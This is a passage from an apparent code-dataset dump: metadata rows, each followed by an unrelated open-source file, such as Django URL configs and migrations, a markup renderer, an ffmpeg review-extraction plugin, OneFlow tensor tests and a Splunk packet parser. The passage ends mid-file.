87ffa029204a02b6b24eb241d0b349c255608b57 | ccfc8b4b6b7a48e387c3ecd56ca110eb9f174367 | /python/work/5.0-stable/project/videoclient/api/persons/photos/urls.py | 75d2aa555f21b805075d975db736c3fe7ef27c5c | [] | no_license | denis-pinaev/tmp_trash | c4d6c4a4cefaacc8af5e93d1175f0a56e3d8e656 | 7642c0ef0cc45b978e579023406abfbbb656896d | refs/heads/master | 2016-08-11T12:03:43.376455 | 2016-03-04T12:53:35 | 2016-03-04T12:53:35 | 52,145,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | from django.conf.urls.defaults import patterns, include, url
import views
# Photo API endpoints.  The fourth positional argument to url() is the
# pattern name used by reverse(); the regex suffix `/*$` matches any number
# of trailing slashes, including none.
urlpatterns = patterns('',
    url(r'^list/*$', views.list, {}, 'api_list_photos'),
    url(r'^left/*$', views.left, {}, 'api_left_photos'),
)
"[email protected]"
] | |
42ea6542998ab172e883faf783222a5f90e1c0ad | ebcb092d796366d36a1afe9c381cd9e4c31026f1 | /python_markup/handlers.py | b4d1acfc276ad3b816d1d590b2c12416311792c6 | [
"MIT"
] | permissive | MiracleWong/PythonBasic | d2e0e56c88781ebf9c6870f185ceaba6ffaa21ca | cb8ec59dc646842b41966ea4ea4b1ee66a342eee | refs/heads/master | 2021-06-06T22:26:08.780210 | 2020-01-08T14:48:54 | 2020-01-08T14:48:54 | 96,536,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,976 | py | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
# filename: handlers.py
# 为文本块打上合适的 HTML 标记
class Handler:
    """Base event dispatcher for the markup processor.

    Parser events are routed to optional handler methods by naming
    convention: ``start(name)`` calls ``start_<name>``, ``end(name)``
    calls ``end_<name>``, and ``sub(name)`` builds a regex-substitution
    callback backed by ``sub_<name>``.
    """
    def callback(self, prefix, name, *args):
        """Invoke ``<prefix><name>(*args)`` if such a method exists."""
        handler = getattr(self, prefix + name, None)
        if callable(handler):
            return handler(*args)
    def start(self, name):
        self.callback('start_', name)
    def end(self, name):
        self.callback('end_', name)
    def sub(self, name):
        """Return a substitution function suitable for ``re.sub``.

        Falls back to the unmodified match text when no ``sub_<name>``
        handler exists or it returns None.
        """
        def substitution(match):
            replaced = self.callback('sub_', name, match)
            return match.group(0) if replaced is None else replaced
        return substitution
class HTMLRenderer(Handler):
    """HTML handler: wraps each parsed text block in the matching HTML tag.

    Fix: the original mixed Python 2 print statements with print(...) calls
    whose closing parenthesis was missing, making the class a SyntaxError on
    every interpreter; all emissions are normalised to the print() function
    (HTML strings are unchanged).
    """
    def start_document(self):
        print('<html><head><title>ShiYanLou</title></head><body>')
    def end_document(self):
        print('</body></html>')
    def start_paragraph(self):
        print('<p style="color: #444;">')
    def end_paragraph(self):
        print('</p>')
    def start_heading(self):
        print('<h2 style="color: #68BE5D;">')
    def end_heading(self):
        print('</h2>')
    def start_list(self):
        print('<ul style="color: #363736;">')
    def end_list(self):
        print('</ul>')
    def start_listitem(self):
        print('<li>')
    def end_listitem(self):
        print('</li>')
    def start_title(self):
        print('<h1 style="color: #1ABC9C;">')
    def end_title(self):
        print('</h1>')
    def sub_emphasis(self, match):
        # Inline substitutions return text instead of printing it.
        return '<em>%s</em>' % match.group(1)
    def sub_url(self, match):
        return '<a target="_blank" style="text-decoration: none;color: #BC1A4B;" href="%s">%s</a>' % (match.group(1), match.group(1))
    def sub_mail(self, match):
        return '<a style="text-decoration: none;color: #BC1A4B;" href="mailto:%s">%s</a>' % (match.group(1), match.group(1))
    def feed(self, data):
        print(data)
"[email protected]"
] | |
6344174edb82b52826ffe9156911e57162cf52b4 | c251223c9829a51fac8ae4d651dba0068da68f43 | /language_converter/main.py | 9d08979ae219e1e14aa3fa15aab2a9150fa319d7 | [] | no_license | Ajax12345/Web-Apps | b1c10e73f2c403cc900a0eddccb1d95b5f71e8aa | 105dfef93aa975cb95fa0216095939d33c2eb19a | refs/heads/master | 2021-01-23T17:34:05.962959 | 2017-09-18T23:44:37 | 2017-09-18T23:44:37 | 102,767,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | from bottle import Bottle, template, request
app = Bottle()
users = [{"ajax1234":"zorro"}]
username = None
password = None
@app.route('/')
def index():
data = {"to_display":"HI, how are you"}
return template("simple.html", to_display = "HI, how are you?")
@app.route('/run_code', method = "POST")
def get_code():
full_code = request.forms.get('code')
print full_code
if __name__ == '__main__':
app.run()
| [
"[email protected]"
] | |
11372e1174c14bf0f2fcd7bcb02fba3c76370519 | 8ce87aa7b8230a3fd474501c35e23c564f2780d0 | /organizacion/migrations/0003_auto_20150725_0630.py | f233fa0171a7b7febfa5efddf0ad37f6e59aded2 | [] | no_license | ErickMurillo/canicacao | 46e7a485257ab95902fb427d4cb0b5e72fd14ab5 | d4a79260c87d1ae1cdd8ecb8bc4be82e9ddb0cc7 | refs/heads/master | 2020-12-29T02:24:36.519281 | 2018-03-16T15:38:26 | 2018-03-16T15:38:26 | 35,285,596 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('organizacion', '0002_auto_20150723_2221'),
]
operations = [
migrations.AddField(
model_name='comercializacion_org',
name='fecha',
field=models.IntegerField(default=1, verbose_name=b'A\xc3\xb1o de recolecci\xc3\xb3n de informaci\xc3\xb3n'),
preserve_default=False,
),
migrations.AlterField(
model_name='organizacion',
name='gerente',
field=models.CharField(max_length=200, null=True, verbose_name=b'Representante legal', blank=True),
preserve_default=True,
),
]
| [
"[email protected]"
] | |
b8a5ebd8681495fd6c38f0e14d85a0f3171860dd | dd80a584130ef1a0333429ba76c1cee0eb40df73 | /external/chromium_org/printing/DEPS | bc43b418c77aafd04e87cead8cd587db70d587dc | [
"MIT",
"BSD-3-Clause"
] | permissive | karunmatharu/Android-4.4-Pay-by-Data | 466f4e169ede13c5835424c78e8c30ce58f885c1 | fcb778e92d4aad525ef7a995660580f948d40bc9 | refs/heads/master | 2021-03-24T13:33:01.721868 | 2017-02-18T17:48:49 | 2017-02-18T17:48:49 | 81,847,777 | 0 | 2 | MIT | 2020-03-09T00:02:12 | 2017-02-13T16:47:00 | null | UTF-8 | Python | false | false | 262 | include_rules = [
"+jni",
"+skia/ext",
"+third_party/icu/source/common/unicode",
"+third_party/icu/source/i18n/unicode",
"+third_party/skia",
"+ui/aura",
"+ui/base/resource",
"+ui/base/text",
"+ui/gfx",
"+ui/shell_dialogs",
"+win8/util",
]
| [
"[email protected]"
] | ||
0d8a223b3f1590a1b1e4491f34cf5321e061913b | 07eb17b45ce5414282a2464c69f50197968c312d | /stusched/app/urls.py | ffdfa5ca2f2ce34e32c9ac872ee1c74578091181 | [] | no_license | cmontemuino/dbschools | e15d4d03a3d2f0e1ee1fa47b8ce9748b7f09cdbc | d3ee1fdc5c36274e5d5f7834ca1110b941d097b9 | refs/heads/master | 2021-01-16T21:16:56.427183 | 2015-08-02T17:09:43 | 2015-08-02T17:09:43 | 6,158,940 | 0 | 0 | null | 2015-10-15T12:45:34 | 2012-10-10T14:49:16 | HTML | UTF-8 | Python | false | false | 783 | py | """stusched URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import url
from . import views
# Route the site root to the index view and /status to the status view.
urlpatterns = [
    url(r'^$', views.index, name='index'),
    url(r'^status$', views.status, name='status'),
]
| [
"[email protected]"
] | |
584809ed53ad5619053d2185651806cf8714ed04 | 2195bec4cc44f5eb552f46fe62135d9f22e6dc03 | /apps/trade/migrations/0008_auto_20190122_1826.py | 25d6418999665e72e1ecc7a24ee97f90647b4dac | [] | no_license | DzrJob/gulishop | 5c802d1bba0ad6ec23aa4c29a8ac6abcc085497b | 5620f09cd6d2a99e7643d5ec0b6bc9e1203be6fe | refs/heads/master | 2020-04-16T17:58:17.404170 | 2019-02-07T07:17:59 | 2019-02-07T07:17:59 | 165,797,566 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 862 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2019-01-22 18:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 1.11 makemigrations; annotates the shipping
    # fields of OrderInfo.  Kept verbatim -- Django tracks applied migrations
    # by this content.
    dependencies = [
        ('trade', '0007_auto_20190122_1812'),
    ]
    operations = [
        # The verbose_name strings are the Chinese labels shown in the admin
        # UI (shipping address, contact phone, recipient name).
        migrations.AlterField(
            model_name='orderinfo',
            name='address',
            field=models.CharField(max_length=200, verbose_name='收货地址'),
        ),
        migrations.AlterField(
            model_name='orderinfo',
            name='signer_mobile',
            field=models.CharField(max_length=11, verbose_name='联系电话'),
        ),
        migrations.AlterField(
            model_name='orderinfo',
            name='signer_name',
            field=models.CharField(max_length=30, verbose_name='签收人'),
        ),
    ]
| [
"[email protected]"
] | |
c7c6abe6ddd69173a76601375d5aa36b3acc06e4 | 0627cc5c3adb47fd4e780b31a76d17839ad384ec | /tensorflow_probability/python/layers/__init__.py | 55a5079eaf94190c21b271793559f7ec7f4b90b3 | [
"Apache-2.0"
] | permissive | ml-lab/probability | 7e57377ae15bcbb9a7878e23d53f4505823b9117 | 09c1e495c929f5bc461a4edbc7710ab81b5b4933 | refs/heads/master | 2021-09-09T04:40:10.045594 | 2018-03-13T23:26:59 | 2018-03-13T23:27:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,304 | py | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""TensorFlow Probability layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow_probability.python.layers.conv_variational import convolution1d_flipout
from tensorflow_probability.python.layers.conv_variational import convolution1d_reparameterization
from tensorflow_probability.python.layers.conv_variational import Convolution1DFlipout
from tensorflow_probability.python.layers.conv_variational import Convolution1DReparameterization
from tensorflow_probability.python.layers.conv_variational import convolution2d_flipout
from tensorflow_probability.python.layers.conv_variational import convolution2d_reparameterization
from tensorflow_probability.python.layers.conv_variational import Convolution2DFlipout
from tensorflow_probability.python.layers.conv_variational import Convolution2DReparameterization
from tensorflow_probability.python.layers.conv_variational import convolution3d_flipout
from tensorflow_probability.python.layers.conv_variational import convolution3d_reparameterization
from tensorflow_probability.python.layers.conv_variational import Convolution3DFlipout
from tensorflow_probability.python.layers.conv_variational import Convolution3DReparameterization
from tensorflow_probability.python.layers.dense_variational import dense_flipout
from tensorflow_probability.python.layers.dense_variational import dense_local_reparameterization
from tensorflow_probability.python.layers.dense_variational import dense_reparameterization
from tensorflow_probability.python.layers.dense_variational import DenseFlipout
from tensorflow_probability.python.layers.dense_variational import DenseLocalReparameterization
from tensorflow_probability.python.layers.dense_variational import DenseReparameterization
from tensorflow_probability.python.layers.util import default_loc_scale_fn
from tensorflow_probability.python.layers.util import default_mean_field_normal_fn
__all__ = [
'Convolution1DFlipout',
'Convolution1DReparameterization',
'Convolution2DFlipout',
'Convolution2DReparameterization',
'Convolution3DFlipout',
'Convolution3DReparameterization',
'DenseFlipout',
'DenseLocalReparameterization',
'DenseReparameterization',
'convolution1d_flipout',
'convolution1d_reparameterization',
'convolution2d_flipout',
'convolution2d_reparameterization',
'convolution3d_flipout',
'convolution3d_reparameterization',
'default_loc_scale_fn',
'default_mean_field_normal_fn',
'dense_flipout',
'dense_local_reparameterization',
'dense_reparameterization',
]
| [
"[email protected]"
] | |
a771a00c3fd049c6dc8482812b8ea1fb06246838 | 1c72aa6d53c886d8fb8ae41a3e9b9c6c4dd9dc6f | /Semester 1/Project submissions/Lewis Clarke/Lewis_Clarke_Python_Coding-2016-04-18/Python Coding/Week 6/position_in_alphabet.py | be2781345f12dca69e6c90d6d0f722351786bf62 | [] | no_license | codebubb/python_course | 74761ce3189d67e3aff964c056aeab27d4e94d4a | 4a6ed4a64e6a726d886add8364c65956d5053fc2 | refs/heads/master | 2021-01-11T03:06:50.519208 | 2016-07-29T10:47:12 | 2016-10-17T10:42:29 | 71,114,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | key = 'abcdefghijklmnopqrstuvwxyz'
def alpha():
word = raw_input('Enter a letter to find its numerical value: ')
if word not in key:
word = raw_input('You did not enter a letter.\nEnter a letter to find its numerical value: ')
for i in word:
n = 1
x = (key.index(i) + n)
print x
alpha()
| [
"[email protected]"
] | |
08366dcc624471b8269aabe510ee9f4625242ad9 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03012/s966640357.py | f6c0b5afb072f834dc2ec2f8bf626c997ed95245 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | N = int(input())
W = input().split()
W = [int(w) for w in W]
S = sum(W)
mini = pow(10, 10)
for i in range(N):
mi = abs(S - 2 * sum(W[0:i]))
if mi < mini:
mini = mi
print(mini) | [
"[email protected]"
] | |
65ad7779c0771342e26563f4829f19544fe0d22a | b27dba9265e3fc46453293af33e215784cc60d15 | /pype/plugins/standalonepublisher/publish/extract_review.py | fbc14785a4091115ef61a811360275e740e545fd | [
"MIT"
] | permissive | tws0002/pype | f8f655f51282128b7ac42df77fca58957f416dcd | 80b1aad9990f6c7efabf0430a3da6633054bf4a8 | refs/heads/develop | 2020-04-29T21:51:22.583645 | 2019-12-09T04:23:17 | 2019-12-09T04:23:17 | 176,426,875 | 0 | 0 | MIT | 2019-12-09T04:23:18 | 2019-03-19T04:56:38 | Python | UTF-8 | Python | false | false | 7,630 | py | import os
import tempfile
import pyblish.api
from pype.vendor import clique
import pype.api
class ExtractReviewSP(pyblish.api.InstancePlugin):
    """Extracting Review mov file for Ftrack

    Compulsory attribute of representation is tags list with "review",
    otherwise the representation is ignored.

    All new represetnations are created and encoded by ffmpeg following
    presets found in `pype-config/presets/plugins/global/publish.json:ExtractReview:outputs`. To change the file extension
    filter values use preset's attributes `ext_filter`
    """

    label = "Extract Review SP"
    order = pyblish.api.ExtractorOrder + 0.02
    families = ["review"]
    hosts = ["standalonepublisher"]

    def process(self, instance):
        """Encode every "review"-tagged representation with ffmpeg, one
        output per profile listed in ``instance.data["repreProfiles"]``,
        then swap the results into ``instance.data["representations"]``.
        """
        # adding plugin attributes from presets
        presets = instance.context.data["presets"]
        try:
            publish_presets = presets["plugins"]["standalonepublisher"]["publish"]
            plugin_attrs = publish_presets[self.__class__.__name__]
        except KeyError:
            raise KeyError("Preset for plugin \"{}\" are not set".format(
                self.__class__.__name__
            ))
        output_profiles = plugin_attrs.get("outputs", {})

        fps = instance.data.get("fps")
        start_frame = instance.data.get("frameStart")
        self.log.debug("Families In: `{}`".format(instance.data["families"]))

        # get specific profile if was defined
        # NOTE(review): assumed present and iterable for "review" instances;
        # a missing "repreProfiles" key makes the loop below raise TypeError.
        specific_profiles = instance.data.get("repreProfiles")

        new_repres = []
        # filter out mov and img sequences
        for repre in instance.data["representations"]:
            tags = repre.get("tags", [])
            if "review" not in tags:
                continue
            staging_dir = repre["stagingDir"]
            for name in specific_profiles:
                profile = output_profiles.get(name)
                if not profile:
                    self.log.warning(
                        "Profile \"{}\" was not found in presets".format(name)
                    )
                    continue
                self.log.debug("Processing profile: {}".format(name))
                # Default container is QuickTime when the profile omits it.
                ext = profile.get("ext", None)
                if not ext:
                    ext = "mov"
                    self.log.debug((
                        "`ext` attribute not in output profile \"{}\"."
                        " Setting to default ext: `mov`"
                    ).format(name))

                # A list of files means an image sequence; collapse it into a
                # printf-style pattern ffmpeg can consume.
                if isinstance(repre["files"], list):
                    collections, remainder = clique.assemble(repre["files"])
                    full_input_path = os.path.join(
                        staging_dir,
                        collections[0].format("{head}{padding}{tail}")
                    )
                    filename = collections[0].format('{head}')
                    if filename.endswith("."):
                        filename = filename[:-1]
                else:
                    full_input_path = os.path.join(staging_dir, repre["files"])
                    filename = repre["files"].split(".")[0]

                # prepare output file (local renamed from `out_stagigng_dir`)
                repr_file = filename + "_{0}.{1}".format(name, ext)
                out_staging_dir = tempfile.mkdtemp(prefix="extract_review_")
                full_output_path = os.path.join(out_staging_dir, repr_file)

                self.log.info("input {}".format(full_input_path))
                self.log.info("output {}".format(full_output_path))

                repre_new = repre.copy()

                # Carry over the source tags (minus "delete") plus any tags
                # the profile adds, without duplicates.
                new_tags = [x for x in tags if x != "delete"]
                p_tags = profile.get("tags", [])
                self.log.info("p_tags: `{}`".format(p_tags))
                for _tag in p_tags:
                    if _tag not in new_tags:
                        new_tags.append(_tag)
                self.log.info("new_tags: `{}`".format(new_tags))

                input_args = []
                # overrides output file
                input_args.append("-y")
                # preset's input data
                input_args.extend(profile.get("input", []))
                # necessary input data
                # adds start arg only if image sequence
                if isinstance(repre["files"], list):
                    input_args.extend([
                        "-start_number {}".format(start_frame),
                        "-framerate {}".format(fps)
                    ])
                input_args.append("-i {}".format(full_input_path))

                output_args = []
                # preset's output data
                output_args.extend(profile.get("output", []))

                if isinstance(repre["files"], list):
                    # set length of video by len of inserted files
                    video_len = len(repre["files"])
                else:
                    video_len = repre["frameEnd"] - repre["frameStart"] + 1
                output_args.append(
                    "-frames {}".format(video_len)
                )

                # letter_box: drawbox bars top and bottom reach the requested
                # aspect ratio ({0} is width/height from the profile).
                lb_string = (
                    "-filter:v "
                    "drawbox=0:0:iw:round((ih-(iw*(1/{0})))/2):t=fill:c=black,"
                    "drawbox=0:ih-round((ih-(iw*(1/{0})))/2):iw:"
                    "round((ih-(iw*(1/{0})))/2):t=fill:c=black"
                )
                letter_box = profile.get("letter_box", None)
                if letter_box:
                    output_args.append(lb_string.format(letter_box))

                # output filename
                output_args.append(full_output_path)

                ffmpeg_path = os.getenv("FFMPEG_PATH", "")
                if ffmpeg_path:
                    ffmpeg_path += "/ffmpeg"
                else:
                    ffmpeg_path = "ffmpeg"

                mov_args = [
                    ffmpeg_path,
                    " ".join(input_args),
                    " ".join(output_args)
                ]
                subprcs_cmd = " ".join(mov_args)

                # run subprocess
                self.log.debug("Executing: {}".format(subprcs_cmd))
                output = pype.api.subprocess(subprcs_cmd)
                self.log.debug("Output: {}".format(output))

                # create representation data
                repre_new.update({
                    "name": name,
                    "ext": ext,
                    "files": repr_file,
                    "stagingDir": out_staging_dir,
                    "tags": new_tags,
                    "outputName": name,
                    "startFrameReview": 1,
                    "endFrameReview": video_len
                })

                # cleanup thumbnail from new repre
                if repre_new.get("thumbnail"):
                    repre_new.pop("thumbnail")
                if "thumbnail" in repre_new["tags"]:
                    repre_new["tags"].remove("thumbnail")

                # adding representation
                self.log.debug("Adding: {}".format(repre_new))

                # cleanup repre from preview
                if "preview" in repre:
                    repre.pop("preview")
                if "preview" in repre["tags"]:
                    repre["tags"].remove("preview")

                new_repres.append(repre_new)

        # Drop source representations tagged for deletion.  Bug fix: iterate
        # over a shallow copy -- the original removed from the list while
        # iterating it, which skips the element following each removal.
        for repre in list(instance.data["representations"]):
            if "delete" in repre.get("tags", []):
                instance.data["representations"].remove(repre)

        for repre in new_repres:
            self.log.debug("Adding repre: \"{}\"".format(
                repre
            ))
            instance.data["representations"].append(repre)
| [
"[email protected]"
] | |
819ff6ab0594922528da4d79e8be19d32e18fad2 | 73a0f661f1423d63e86489d4b2673f0103698aab | /python/oneflow/test/modules/test_contiguous.py | 4d589b551f159a895bb5b71bb58e4fb4ae3bb792 | [
"Apache-2.0"
] | permissive | Oneflow-Inc/oneflow | 4fc3e081e45db0242a465c4330d8bcc8b21ee924 | 0aab78ea24d4b1c784c30c57d33ec69fe5605e4a | refs/heads/master | 2023-08-25T16:58:30.576596 | 2023-08-22T14:15:46 | 2023-08-22T14:15:46 | 81,634,683 | 5,495 | 786 | Apache-2.0 | 2023-09-14T09:44:31 | 2017-02-11T06:09:53 | C++ | UTF-8 | Python | false | false | 4,922 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
from random import shuffle
import numpy as np
from oneflow.test_utils.automated_test_util import *
from oneflow.test_utils.test_util import GenArgList
import oneflow.unittest
import oneflow as flow
@flow.unittest.skip_unless_1n1d()
class TestContiguous(flow.unittest.TestCase):
    """Exercise Tensor.contiguous() on transposed/permuted (non-contiguous) tensors.

    NOTE(review): the @autotest decorator presumably replays each body under
    both oneflow and PyTorch and compares outputs (see
    oneflow.test_utils.automated_test_util) — confirm in the framework docs.
    auto_backward=False skips gradient checks for dtypes without autograd.
    """
    @autotest(n=5)
    def test_transpose_with_random_data(test_case):
        # transpose produces a non-contiguous view; contiguous() must copy it.
        device = random_device()
        x = random_tensor(ndim=4).to(device)
        y = torch.transpose(x, dim0=random(1, 3).to(int), dim1=random(1, 3).to(int))
        z = y.contiguous()
        return z
    @autotest(n=5, auto_backward=False)
    def test_transpose_with_bool_data(test_case):
        # Same as above, but for bool tensors (no gradients).
        device = random_device()
        x = random_tensor(ndim=4, requires_grad=False).to(device).to(torch.bool)
        y = torch.transpose(x, dim0=random(1, 3).to(int), dim1=random(1, 3).to(int))
        z = y.contiguous()
        return z
    @autotest(n=5, auto_backward=False)
    def test_transpose_with_int_data(test_case):
        # Integer tensors: forward-only check.
        device = random_device()
        x = random_tensor(ndim=4, requires_grad=False).to(device).to(torch.int)
        y = torch.transpose(x, dim0=random(1, 3).to(int), dim1=random(1, 3).to(int))
        z = y.contiguous()
        return z
    @autotest(n=5, auto_backward=False)
    def test_contiguous_with_half_data(test_case):
        # float16 tensors: forward-only check.
        device = random_device()
        x = random_tensor(ndim=4, requires_grad=False).to(device).to(torch.float16)
        y = torch.transpose(x, dim0=random(1, 3).to(int), dim1=random(1, 3).to(int))
        z = y.contiguous()
        return z
    @autotest(n=10, check_graph=True)
    def test_permute2d_tensor_with_random_data(test_case):
        # Random permutation of a 2-D tensor's axes, then contiguous().
        device = random_device()
        ndim = 2
        permute_list = [0, 1]
        shuffle(permute_list)
        x = random_tensor(
            ndim=ndim, dim0=random(1, 32).to(int), dim1=random(1, 59).to(int),
        ).to(device)
        y = x.permute(permute_list)
        z = y.contiguous()
        return z
    @autotest(n=10, check_graph=True)
    def test_permute3d_tensor_with_random_data(test_case):
        # Random permutation of a 3-D tensor's axes, then contiguous().
        device = random_device()
        ndim = 3
        permute_list = [0, 1, 2]
        shuffle(permute_list)
        x = random_tensor(
            ndim=ndim,
            dim0=random(1, 7).to(int),
            dim1=random(1, 15).to(int),
            dim2=random(1, 9).to(int),
        ).to(device)
        y = x.permute(permute_list)
        z = y.contiguous()
        return z
    @autotest(n=10, check_graph=True)
    def test_permute4d_tensor_with_random_data(test_case):
        # Random permutation of a 4-D tensor's axes, then contiguous().
        device = random_device()
        ndim = 4
        permute_list = [0, 1, 2, 3]
        shuffle(permute_list)
        x = random_tensor(
            ndim=ndim,
            dim0=random(1, 7).to(int),
            dim1=random(1, 15).to(int),
            dim2=random(1, 9).to(int),
            dim3=random(1, 19).to(int),
        ).to(device)
        y = x.permute(permute_list)
        z = y.contiguous()
        return z
    @profile(torch.Tensor.contiguous)
    def profile_contiguous(test_case):
        # Benchmark hook: presumably profiles contiguous() on a fixed tensor — confirm.
        x = torch.ones(32, 3, 128, 128)
        x.contiguous()
def _test_inplace_contiguous(test_case, device):
    """Check that contiguous_() works in place while contiguous() copies.

    After contiguous_(), the same tensor object (identical id) must be
    contiguous and hold the same values as the copy made by contiguous().
    """
    arr = np.random.randn(4, 5, 6, 7).astype(np.float32)
    # Renamed from `input` to avoid shadowing the builtin of the same name.
    src = flow.tensor(arr, device=device)
    x = src.permute(0, 3, 2, 1)  # x is a non-contiguous view
    test_case.assertFalse(x.is_contiguous())
    # y1 is the out-of-place version of tensor contiguous
    y1 = x.contiguous()
    # y2 is the in-place version of tensor contiguous
    y2 = x.contiguous_()
    test_case.assertTrue(np.array_equal(y1.cpu().numpy(), y2.cpu().numpy()))
    # contiguous() must return a new object; contiguous_() must return x itself.
    test_case.assertNotEqual(id(x), id(y1))
    test_case.assertEqual(id(x), id(y2))
    test_case.assertTrue(x.is_contiguous())
    test_case.assertTrue(y1.is_contiguous())
    test_case.assertTrue(y2.is_contiguous())
@flow.unittest.skip_unless_1n1d()
class TestInplaceContiguous(flow.unittest.TestCase):
    """Drive _test_inplace_contiguous over every device in the argument matrix."""

    def test_inplace_contiguous(test_case):
        # Cartesian product of test functions and devices, in a fixed order.
        matrix = OrderedDict([
            ("test_fun", [_test_inplace_contiguous]),
            ("device", ["cpu", "cuda"]),
        ])
        for combo in GenArgList(matrix):
            combo[0](test_case, *combo[1:])
if __name__ == "__main__":
    # Discover and run all the test cases defined above.
    unittest.main()
| [
"[email protected]"
] | |
acf80746855eaad75fcbdc580daa49d5bee0bf95 | 20176bf4fbd8aec139c7b5a27f2c2e155e173e6e | /data/all-pratic/oinam_singh/myprogram/filewordcnt2.py | 993801d7b654e4f8041739bbfb5d975e82b48048 | [] | no_license | githubjyotiranjan/pytraining | 4ac4a1f83cc4270e2939d9d32c705019c5bc61c5 | 8b50c4ab7848bd4cbfdfbc06489768d577289c66 | refs/heads/master | 2020-03-19T06:22:20.793296 | 2018-06-15T20:08:11 | 2018-06-15T20:08:11 | 136,013,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | import operator
from collections import OrderedDict
from collections import defaultdict
# Count word occurrences in tmpread.txt, then show the counts ordered by
# frequency and alphabetically.
word_counts = defaultdict(int)
with open('tmpread.txt') as fh:
    for raw_line in fh:
        for token in raw_line.strip().split():
            word_counts[token] += 1
print(word_counts.items())
print(word_counts.keys())
# Counts ordered by ascending frequency.
by_value = OrderedDict(sorted(word_counts.items(), key=operator.itemgetter(1)))
print(by_value.items())
print(by_value.keys())
# Counts ordered alphabetically by word.
by_key = OrderedDict(sorted(word_counts.items(), key=operator.itemgetter(0)))
print(by_key.items())
print(by_key.keys())
| [
"[email protected]"
] | |
74f3ef6c3e844f6f8fa1234a783e57b16eddff82 | 8b57c6609e4bf3e6f5e730b7a4a996ad6b7023f0 | /persistconn/packet.py | 79a3d92edb26b212d7c04844f89ece59d3e93669 | [] | no_license | bullll/splunk | 862d9595ad28adf0e12afa92a18e2c96308b19fe | 7cf8a158bc8e1cecef374dad9165d44ccb00c6e0 | refs/heads/master | 2022-04-20T11:48:50.573979 | 2020-04-23T18:12:58 | 2020-04-23T18:12:58 | 258,293,313 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,103 | py | from builtins import range
from builtins import object
import sys, os
import json
import splunk.util
class PersistentServerConnectionProtocolException(Exception):
    """
    Exception thrown when a received packet can't be interpreted
    """
    pass
class PersistentServerConnectionRequestPacket(object):
    """
    Object representing a received packet.

    Wire format: one opcode byte (extra b"\\n" bytes before it are ignored),
    then, when OPCODE_REQUEST_INIT is set, a component count followed by that
    many length-prefixed command strings and a length-prefixed argument; when
    OPCODE_REQUEST_BLOCK is set, a length-prefixed payload block follows.
    """

    OPCODE_REQUEST_INIT = 0x01
    OPCODE_REQUEST_BLOCK = 0x02
    OPCODE_REQUEST_END = 0x04
    OPCODE_REQUEST_ALLOW_STREAM = 0x08

    def __init__(self):
        self.opcode = None       # raw opcode byte value
        self.command = None      # list of command path components (first packet only)
        self.command_arg = None  # optional command argument (first packet only)
        self.block = None        # payload bytes when has_block()

    def is_first(self):
        """
        @rtype: bool
        @return: True if this packet represents the beginning of the request
        """
        return (self.opcode & PersistentServerConnectionRequestPacket.OPCODE_REQUEST_INIT) != 0

    def is_last(self):
        """
        @rtype: bool
        @return: True if this packet represents the end of the request
        """
        return (self.opcode & PersistentServerConnectionRequestPacket.OPCODE_REQUEST_END) != 0

    def has_block(self):
        """
        @rtype: bool
        @return: True if this packet contains an input block for the request
        """
        return (self.opcode & PersistentServerConnectionRequestPacket.OPCODE_REQUEST_BLOCK) != 0

    def allow_stream(self):
        """
        For future use.
        """
        return (self.opcode & PersistentServerConnectionRequestPacket.OPCODE_REQUEST_ALLOW_STREAM) != 0

    def __str__(self):
        # Build the description piece by piece, then join with single spaces.
        pieces = ["is_first=%c is_last=%c allow_stream=%c" % (
            "NY"[self.is_first()],
            "NY"[self.is_last()],
            "NY"[self.allow_stream()])]
        if self.command is not None:
            pieces.append("command=%s" % json.dumps(self.command))
        if self.command_arg is not None:
            pieces.append("command_arg=%s" % json.dumps(self.command_arg))
        if self.has_block():
